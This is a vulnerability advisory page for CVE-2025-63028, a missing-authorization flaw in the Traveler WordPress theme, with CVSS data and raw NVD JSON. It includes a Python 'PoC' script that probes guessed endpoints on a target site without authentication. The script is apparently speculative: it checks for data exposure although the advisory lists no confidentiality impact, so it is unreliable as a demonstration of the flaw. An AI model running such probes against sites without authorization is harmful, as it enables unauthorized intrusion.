Security Vulnerability Report
中文
CVE-2025-63028 CVSS 5.3 MEDIUM

CVE-2025-63028

Published: 2025-12-09 16:18:08
Last Modified: 2026-04-27 19:16:19

Description

Missing Authorization vulnerability in shinetheme Traveler traveler allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Traveler: from n/a through <= 3.2.6.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Traveler主题 所有版本 <= 3.2.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-63028 PoC - Traveler Theme Broken Access Control # Target: WordPress sites using Traveler theme <= 3.2.6 import requests import sys def check_vulnerability(target_url): """ Check if the target is vulnerable to CVE-2025-63028 Missing Authorization in Traveler theme """ vulnerabilities = [] # Common endpoints that might be affected endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/wp/v2/users', '/?rest_route=/traveler/v1/bookings', '/?action=st_get_data' ] for endpoint in endpoints: try: url = target_url.rstrip('/') + endpoint headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/x-www-form-urlencoded' } # Test without authentication response = requests.get(url, headers=headers, timeout=10, verify=False) # Check for sensitive data exposure if response.status_code == 200: if 'user_email' in response.text or 'username' in response.text: vulnerabilities.append(f"Potential data exposure at {endpoint}") if 'booking' in response.text.lower() or 'reservation' in response.text.lower(): vulnerabilities.append(f"Potential booking data at {endpoint}") except requests.exceptions.RequestException as e: print(f"Error testing {endpoint}: {e}") return vulnerabilities if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: python cve-2025-63028-poc.py <target_url>") print("Example: python cve-2025-63028-poc.py http://example.com") sys.exit(1) target = sys.argv[1] print(f"[*] Scanning {target} for CVE-2025-63028...") results = check_vulnerability(target) if results: print("[!] Potential vulnerabilities found:") for r in results: print(f" - {r}") else: print("[*] No obvious vulnerabilities detected")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63028", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:08.493", "lastModified": "2026-04-27T19:16:18.907", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in shinetheme Traveler traveler allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Traveler: from n/a through <= 3.2.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/traveler/vulnerability/wordpress-traveler-theme-3-2-6-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}